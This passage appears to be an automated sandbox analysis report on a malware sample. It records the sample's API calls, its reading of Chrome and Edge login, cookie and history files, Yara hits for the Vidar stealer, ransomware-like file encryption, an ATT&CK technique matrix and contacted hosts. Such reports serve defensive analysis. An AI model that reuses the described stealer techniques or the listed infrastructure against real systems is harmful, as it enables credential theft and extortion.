          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0229C8B7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_022A394D
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_022A49EA
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_022A3F87
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: EnumSystemLocalesW,2_2_004387C8
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoW,2_2_0043884E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: EnumSystemLocalesW,2_2_00437E27
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_02270AB6
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0225C8B7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_0226394D
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_022649EA
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_02263F87
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_0043404A
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,6_2_00438178
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_00440116
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004382A2
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_0043834F
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,6_2_00438423
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_004335E7
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: EnumSystemLocalesW,6_2_004387C8
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: GetLocaleInfoW,6_2_0043884E
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,6_2_00432B6D
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,6_2_00437BB3
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: EnumSystemLocalesW,6_2_00437E27
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_00437E83
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_00437F00
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,6_2_0042BF17
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,6_2_00437F83
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_00432FAD
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0040BF7C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040BF7C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0041ACD6 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0041ACD6
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: build2.exe, 0000000F.00000003.1426795482.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2492977854.0000000003210000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1426795482.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7480, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7480, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Vidar stealer
          Source: Yara matchFile source: 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7480, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
          Valid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          System Time Discovery          		1
          Taint Shared Content          		11
          Archive Collected Data          		Exfiltration Over Other Network Medium12
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization2
          Data Encrypted for Impact          		Acquire InfrastructureGather Victim Identity Information
          Default Accounts2
          Native API          		1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		3
          Obfuscated Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth21
          Encrypted Channel          		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
          Domain Accounts3
          Command and Scripting Interpreter          		1
          Services File Permissions Weakness          		211
          Process Injection          		22
          Software Packing          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Screen Capture          		Automated Exfiltration1
          Non-Standard Port          		Data Encrypted for ImpactDNS ServerEmail Addresses
          Local AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		NTDS44
          System Information Discovery          		Distributed Component Object ModelInput CaptureTraffic Duplication2
          Non-Application Layer Protocol          		Data DestructionVirtual Private ServerEmployee Names
          Cloud AccountsLaunchdNetwork Logon Script1
          Services File Permissions Weakness          		1
          Masquerading          		LSA Secrets1
          Query Registry          		SSHKeyloggingScheduled Transfer113
          Application Layer Protocol          		Data Encrypted for ImpactServerGather Victim Network Information
          Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion          		Cached Domain Credentials271
          Security Software Discovery          		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
          External Remote ServicesSystemd TimersStartup ItemsStartup Items211
          Process Injection          		DCSync21
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
          Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Services File Permissions Weakness          		Proc Filesystem2
          Process Discovery          		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
          Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
          Supply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Network Configuration Discovery          		Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1373019 Sample: E0tabE4K4r.exe Startdate: 11/01/2024 Architecture: WINDOWS Score: 100 71 zexeq.com 2->71 73 brusuax.com 2->73 75 2 other IPs or domains 2->75 87 Snort IDS alert for network traffic 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 11 other signatures 2->93 11 E0tabE4K4r.exe 2->11         started        14 E0tabE4K4r.exe 2->14         started        16 E0tabE4K4r.exe 2->16         started        18 E0tabE4K4r.exe 2->18         started        signatures3 process4 signatures5 107 Detected unpacking (changes PE section rights) 11->107 109 Detected unpacking (overwrites its own PE header) 11->109 111 Found stalling execution ending in API Sleep call 11->111 121 3 other signatures 11->121 20 E0tabE4K4r.exe 1 16 11->20         started        113 Antivirus detection for dropped file 14->113 115 Multi AV Scanner detection for dropped file 14->115 117 Machine Learning detection for dropped file 14->117 24 E0tabE4K4r.exe 16 14->24         started        119 Injects a PE file into a foreign processes 16->119 27 E0tabE4K4r.exe 16->27         started        29 E0tabE4K4r.exe 18->29         started        process6 dnsIp7 77 api.2ip.ua 172.67.139.220, 443, 49705, 49706 CLOUDFLARENETUS United States 20->77 49 C:\Users\user\AppData\...0tabE4K4r.exe, PE32 20->49 dropped 31 E0tabE4K4r.exe 20->31         started        34 icacls.exe 20->34         started        51 C:\Users\user\_readme.txt, ASCII 24->51 dropped 53 C:\Users\user\Desktop\UQMPCTZARJ.xlsx, data 24->53 dropped 55 C:\Users\user\Desktop\TQDGENUHWP.pdf, data 24->55 dropped 57 2 other malicious files 24->57 dropped 97 Modifies existing user documents (likely ransomware behavior) 24->97 file8 signatures9 process10 signatures11 127 Injects a PE file into a foreign processes 31->127 36 E0tabE4K4r.exe 1 19 31->36         started        process12 dnsIp13 79 brusuax.com 211.40.39.251, 49708, 80 LGDACOMLGDACOMCorporationKR Korea Republic of 36->79 81 zexeq.com 109.175.29.39, 49709, 49710, 49711 BIHNETBIHNETAutonomusSystemBA Bosnia and Herzegowina 36->81 59 C:\Users\user\AppData\Local\...\build2[1].exe, PE32 36->59 dropped 61 C:\Users\user\AppData\Local\...\build2.exe, PE32 36->61 dropped 63 C:\Users\user\...\acroNGLLog.txt.cdqw (copy), data 36->63 dropped 65 108 other malicious files 36->65 dropped 95 Infects executable files (exe, dll, sys, html) 36->95 41 build2.exe 36->41         started        file14 signatures15 process16 signatures17 99 Multi AV Scanner detection for dropped file 41->99 101 Detected unpacking (changes PE section rights) 41->101 103 Detected unpacking (overwrites its own PE header) 41->103 105 3 other signatures 41->105 44 build2.exe 41->44         started        process18 dnsIp19 83 t.me 149.154.167.99, 443, 49712 TELEGRAMRU United Kingdom 44->83 85 49.12.114.15, 10220, 49713, 49717 HETZNER-ASDE Germany 44->85 67 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 44->67 dropped 69 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 44->69 dropped 123 Tries to detect sandboxes and other dynamic analysis tools (process 